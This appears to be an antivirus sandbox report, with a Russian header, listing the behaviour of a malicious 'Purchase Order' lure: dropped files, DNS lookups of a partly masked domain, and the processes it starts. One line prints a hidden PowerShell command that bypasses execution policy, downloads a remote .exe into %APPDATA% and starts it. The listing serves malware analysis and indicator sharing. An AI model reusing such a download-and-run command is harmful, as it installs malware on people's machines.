Техническая информация
- http://ma###msrl.com/frs8umnq9myy5ap.exe как %appdata%\purchase order
- %TEMP%\abdtfhghgdghghœ.sct
- %APPDATA%\purchase order
- 'ma###msrl.com':80
- DNS ASK ma###msrl.com
- ClassName: 'AdobeAcrobat' WindowName: ''
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ma###msrl.com/frS8UmNq9MyY5Ap.exe','%APPDATA%\Purchase Order');Start-P...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\Purchase Order
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\Purchase Order"